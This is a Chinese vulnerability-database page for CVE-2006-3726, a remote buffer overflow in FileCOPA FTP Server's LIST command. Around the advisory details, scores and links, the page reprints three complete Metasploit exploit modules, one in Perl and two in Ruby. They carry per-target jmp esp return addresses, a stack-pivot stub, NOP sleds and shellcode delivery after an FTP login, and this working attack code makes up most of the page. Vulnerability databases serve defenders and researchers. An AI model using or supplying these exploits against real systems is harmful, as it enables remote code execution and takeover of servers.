CVE-2006-3726
CVSS6.5
发布时间 :2006-07-21 10:03:00
修订时间 :2011-03-07 21:39:21
NMCOEP    

[原文]Buffer overflow in FileCOPA FTP Server before 1.01 released on 18th July 2006, allows remote authenticated attackers to execute arbitrary code via a long argument to the LIST command.


[CNNVD]Intervations FileCopa LIST命令远程缓冲区溢出漏洞(CNNVD-200607-332)

        FileCopa是一款自动化的FTP服务器软件。
        FileCopa FTP Server处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        如果攻击者能够成功的登录到FTP服务器(默认允许匿名访问)并提交畸形恶意的LIST命令的话,就可以导致执行任意指令。

- CVSS (基础分值)

CVSS分值: 6.5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3726
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3726
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-332
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/21108
(VENDOR_ADVISORY)  SECUNIA  21108
http://xforce.iss.net/xforce/xfdb/27817
(UNKNOWN)  XF  filecopa-list-bo(27817)
http://www.vupen.com/english/advisories/2006/2870
(UNKNOWN)  VUPEN  ADV-2006-2870
http://www.osvdb.org/27389
(UNKNOWN)  OSVDB  27389
http://www.appsec.ch/docs/2006-07-19-fileCopa.txt
(VENDOR_ADVISORY)  MISC  http://www.appsec.ch/docs/2006-07-19-fileCopa.txt
http://www.securityfocus.com/bid/19065
(UNKNOWN)  BID  19065

- 漏洞信息

Intervations FileCopa LIST命令远程缓冲区溢出漏洞
中危 缓冲区溢出
2006-07-21 00:00:00 2006-08-28 00:00:00
远程  
        FileCopa是一款自动化的FTP服务器软件。
        FileCopa FTP Server处理用户请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        如果攻击者能够成功的登录到FTP服务器(默认允许匿名访问)并提交畸形恶意的LIST命令的话,就可以导致执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.filecopa.com/

- 漏洞信息 (3107)

FileCOPA FTP Server <= 1.01 (LIST) Remote BoF Exploit (meta) (EDBID:3107)
windows remote
2007-01-09 Verified
21 Jacopo Cervini
[点击下载] [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::filecopa_list;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
  {
	'Name'    => 'FileCopa FTP Server pre 18 Jul Version',
	'Version' => '$Revision: 0.1 $',
	'Authors' =>
	  [ 
		'Jacopo Cervini <acaro [at] jervus.it>'
	  ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'  => 0,

	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 21],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
		'USER'  => [1, 'DATA', 'Username', 'test'],
		'PASS'  => [1, 'DATA', 'Password', 'test'],
	  },

	'Payload' =>
	  {
		'Space'  => 400,
		'BadChars'  => "\x00\x0a\x0d",
		# 'Prepend'	=> "\x81\xc4\x54\xf2\xff\xff",	# add esp, -3500
		'Keys' 		=> ['+ws2ord'],
	  },

	'Description'  =>  Pex::Text::Freeform(qq{
        This module exploits the buffer overflow found in the LIST command
        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch.    
}),

	'Refs'  =>
	  [
		['BID', '19065'],
		
	  ],

	'DefaultTarget' => 0,
	'Targets' =>
	  [

		['Windows 2000 SP4 English',	160, 0x7c2e7993 ], # jmp esp in ADVAPI32.dll
		['Windows 2000 SP4 Italian',	160, 0x79277993 ], # jmp esp in ADVAPI32.dll
		['Windows XP SP2 English',	240, 0x77df2740 ], # jmp esp in ADVAPI32.dll
		
		

	  ],

	'Keys' => ['filecopa'],

	'DisclosureDate' => 'Jul 19 2006',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}


sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];




	
	
	my $jmp = "\x66\x81\xc1\xa0\x01\x51\xc3";

	#66:81C1 A001   ADD CX,1A0
	#51             PUSH ECX
	#C3             RETN
    

	my $pattern = ("A" x $target->[1]);
         $pattern .= pack('V', $target->[2]);
	   $pattern .= ("\x90"x4);
	   $pattern .= $jmp;
	   $pattern .= ("\x90"x283);
	   $pattern .= $shellcode; 

	   
	my $request = "A " . $pattern ."\r\n";

	

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	my $r = $s->RecvLineMulti(20);
	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
	$self->Print($r);

	$s->Send("USER " . $self->GetVar('USER') . "\r\n");
	$r = $s->RecvLineMulti(20);
	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
	$self->Print($r);


	$s->Send("PASS ".$self->GetVar('PASS')."\r\n");
	$r = $s->RecvLineMulti(20);
	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
	$self->Print($r);

	$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[2]));


	$s->Send("LIST $request");
	
	sleep(2);
	return;
}

# milw0rm.com [2007-01-09]
		

- 漏洞信息 (16733)

FileCopa FTP Server pre 18 Jul Version (EDBID:16733)
windows remote
2010-04-30 Verified
21 metasploit
[点击下载] [点击下载]
##
# $Id: filecopa_list_overflow.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
			'Description'    => %q{
					This module exploits the buffer overflow found in the LIST command
				in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
			},
			'Author'         => [ 'Jacopo Cervini' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-3726' ],
					[ 'OSVDB', '27389' ],
					[ 'BID', '19065' ],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',

			'Targets'        =>
				[
					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
				],
			'DisclosureDate' => 'Jul 19 2006',
			'DefaultTarget' => 0))
	end


	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		sploit =  "A "
		sploit << make_nops(target['Nops'])
		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded

		send_cmd( ['LIST', sploit] , false)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83114)

FileCopa FTP Server pre 18 Jul Version (PacketStormID:F83114)
2009-11-26 00:00:00
Jacopo Cervini  metasploit.com
exploit,overflow
CVE-2006-3726
[点击下载]

This Metasploit module exploits the buffer overflow found in the LIST command in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'FileCopa FTP Server pre 18 Jul Version',
			'Description'    => %q{
				This module exploits the buffer overflow found in the LIST command
        in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
			},
			'Author'         => [ 'Jacopo Cervini' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-3726' ],
					[ 'OSVDB', '27389' ],
					[ 'BID', '19065' ],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',

			'Targets'        => 
				[
					[ 'Windows 2k Server SP4 English',   { 'Ret' => 0x7c2e7993, 'Nops' => 160 } ], # jmp esp
					[ 'Windows XP Pro SP2 Italian',      { 'Ret' => 0x77f62740, 'Nops' => 240 } ]  # jmp esp
				],
			'DisclosureDate' => 'Jul 19 2006',
			'DefaultTarget' => 0))
	end

	
	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		sploit =  "A "
		sploit << make_nops(target['Nops'])
		sploit << [target.ret].pack('V') + make_nops(4) + "\x66\x81\xc1\xa0\x01\x51\xc3" + make_nops(189) + payload.encoded 

		send_cmd( ['LIST', sploit] , false)

		handler
		disconnect
	end

end
    

- 漏洞信息

27389
FileCOPA FTP Server LIST Command Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public, Exploit Commercial

- 漏洞描述

A remote or local overflow exists in FileCOPA FTP server. The server fails to handle a long (Approx 350 bytes) parameter to the LIST command resulting in a buffer overflow. With a specially crafted LIST command, an attacker can cause a denial of service or possibly execute arbitrary code.

- 时间线

2006-07-19 2006-07-17
Unknow Unknow

- 解决方案

Upgrade to version 1.01 (2006-07-18) or higher, as it has been reported to fix this vulnerability. Note that this flaw was fixed in the 2006-07-18 release without a change in version number. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站